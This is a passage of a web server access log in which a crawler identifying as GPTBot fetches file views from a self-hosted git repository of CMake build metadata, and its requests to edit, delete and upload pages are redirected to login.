+[17/Feb/2026:19:52:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:52:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:52:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=source" [Client 74.7.227.38] [Length 13004] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:52:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 1694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:52:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 14168] [Gzip 8.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:52:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:52:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:52:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:52:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:52:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:52:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:52:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 1001] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:52:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10530] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:52:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=rendered" [Client 74.7.227.38] [Length 11366] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:52:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=source" [Client 74.7.227.38] [Length 13839] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:52:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 9886] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:52:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 9887] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:52:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:52:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:52:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:52:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:52:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:52:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 971] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:52:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api" +[17/Feb/2026:19:52:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api" +[17/Feb/2026:19:52:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:19:52:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:19:52:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:52:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:52:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:52:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:52:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=rendered" [Client 74.7.227.38] [Length 11368] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:52:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:52:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:52:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:52:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:52:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11363] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:52:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=rendered" [Client 74.7.227.38] [Length 11369] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:52:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api" +[17/Feb/2026:19:52:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api" +[17/Feb/2026:19:52:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11369] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:52:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11833] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:52:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=source" [Client 74.7.227.38] [Length 26592] [Gzip 11.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:52:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=source" [Client 74.7.227.38] [Length 13896] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:52:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9865] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:19:52:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:19:52:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:19:52:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:19:52:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:19:52:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 10215] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:19:52:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9854] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:19:52:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=rendered" [Client 74.7.227.38] [Length 11360] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:52:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:19:52:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:19:52:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=source" [Client 74.7.227.38] [Length 14537] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:52:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 